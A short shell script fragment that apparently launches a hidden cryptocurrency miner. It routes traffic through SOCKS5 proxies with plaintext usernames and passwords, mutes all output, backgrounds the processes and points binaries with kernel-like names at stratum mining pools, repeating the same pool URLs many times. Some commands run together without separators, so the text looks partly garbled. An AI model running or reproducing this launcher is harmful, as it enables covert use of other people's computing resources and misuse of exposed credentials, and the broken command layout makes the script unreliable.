./mgtcp3 --socks5=45.87.249.108:7686:6304 --socks5_username=aihzpnbr --socks5_password=dogmtwuiyn3a python3 proxy3.py  >/dev/null 2>&1 >/dev/null &
./mgtcp4 --socks5=socks-nl.windscribe.com:1080 --socks5_username=hic6qlo2-n9eqdc8 --socks5_password=2vwp5ebygj python3 proxy4.py >/dev/null 2>&1 >/dev/null &
sleep 3
./kernelp3 -f proxy3.conf ./kernelp4 -f proxy4.conf ./zz ann -p WALLET http://stratum.zetahash.com http://stratum.zetahash.io http://stratum.zetahash.com http://stratum.zetahash.io http://stratum.zetahash.com http://stratum.zetahash.io http://stratum.zetahash.com http://stratum.zetahash.io http://stratum.zetahash.com http://stratum.zetahash.io http://stratum.zetahash.com http://stratum.zetahash.io http://stratum.zetahash.com http://stratum.zetahash.io http://stratum.zetahash.com http://stratum.zetahash.io http://stratum.zetahash.com http://stratum.zetahash.io
